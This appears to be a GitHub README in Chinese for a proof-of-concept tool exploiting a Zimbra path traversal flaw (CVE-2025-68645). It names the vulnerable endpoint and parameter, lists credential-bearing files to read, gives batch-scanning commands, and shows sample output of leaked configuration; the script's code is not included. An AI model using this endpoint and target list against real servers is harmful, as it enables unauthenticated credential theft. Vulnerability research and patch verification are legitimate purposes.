HarisAidhin/Poc_CVE-2025-68645

GitHub: HarisAidhin/Poc_CVE-2025-68645

针对 Zimbra Collaboration Suite 路径遍历漏洞(CVE-2025-68645)的 PoC 工具,可在未认证情况下读取服务器任意文件并提取敏感配置和凭据信息。

Stars: 1 | Forks: 0

# CVE-2025-68645 - Zimbra 路径遍历漏洞 [![安全](https://img.shields.io/badge/Severity-High-red)]() [![CVE](https://img.shields.io/badge/CVE-2025--68645-blue)]() [![Python](https://img.shields.io/badge/Python-3.7%2B-green)]() [![许可证](https://img.shields.io/badge/License-MIT-yellow.svg)]() [![状态](https://img.shields.io/badge/Status-Proof%20of%20Concept-orange)]() ## 📋 概述 **CVE-2025-68645** 是 **Zimbra Collaboration Suite** 中的一个路径遍历漏洞,允许未经身份验证的攻击者从服务器文件系统读取任意文件。 ### 受影响的端点 /h/printconversations?javax.servlet.include.servlet_path= ## 🎯 影响 | 影响 | 严重性 | |--------|----------| | 未授权文件读取 | 🔴 高危 | | 配置信息泄露 | 🔴 高危 | | 凭据泄露 | 🔴 高危 | | 内网结构探测 | 🟠 中危 | ## 📁 可读取的文件 | 路径 | 泄露信息 | |------|---------------------| | `/WEB-INF/web.xml` | Servlet 映射,安全约束 | | `/WEB-INF/zcs.web.xml` | Zimbra 特定配置 | | `/opt/zimbra/conf/localconfig.xml` | LDAP 凭据,数据库密码 | | `/opt/zimbra/conf/ldap-config.xml` | LDAP 服务器配置 | | `/opt/zimbra/conf/attrs/zimbra-attrs.xml` | 系统属性 | | `/WEB-INF/classes/logging.properties` | 日志配置 | ## 🚀 使用方法 ## 单目标扫描 python CVE-2025-68645.py.py -t https://target.zimbra.com ## 批量扫描 python CVE-2025-68645.py.py -l targets.txt -o results.json --threads 20 ## 高级选项 python CVE-2025-68645.py.py -t https://target.zimbra.com -v --timeout 30 ## 📊 命令行参数 参数 描述 默认值 -t, --target 单个目标 URL None -l, --list 包含目标列表的文件 None -o, --output 输出文件名 results.json --threads 并发线程数 10 --timeout 请求超时时间(秒) 15 -v, --verbose 启用详细输出 False --no-verify 禁用 SSL 验证 False --read-all 读取所有敏感路径 False # 📸 示例输出 [*] Scanning: https://target.zimbra.local [✓] VULNERABLE: https://target.zimbra.local [+] Extracted configuration: version: 220726130125 memcached: target.local:11211 httpsPort: 8443 httpPort: 8080 [+] Found: /WEB-INF/web.xml [+] Found: /opt/zimbra/conf/localconfig.xml [!] Possible credentials leaked in /WEB-INF/web.xml ============================================================ SCAN COMPLETE! Time elapsed: 1.02 seconds Total targets: 1 Vulnerable: 1 Not vulnerable: 0
标签:CISA项目, CVE-2025-68645, HTTP工具, Maven, PoC, Python, Web安全, Zimbra, 任意文件读取, 信息泄露, 凭据泄露, 协同办公系统, 情报收集, 数据展示, 无后门, 无服务器架构, 无线安全, 暴力破解, 未授权访问, 漏洞研究, 漏洞验证, 红队, 网络安全, 网络安全审计, 蓝队分析, 路径遍历, 逆向工具, 配置文件读取, 隐私保护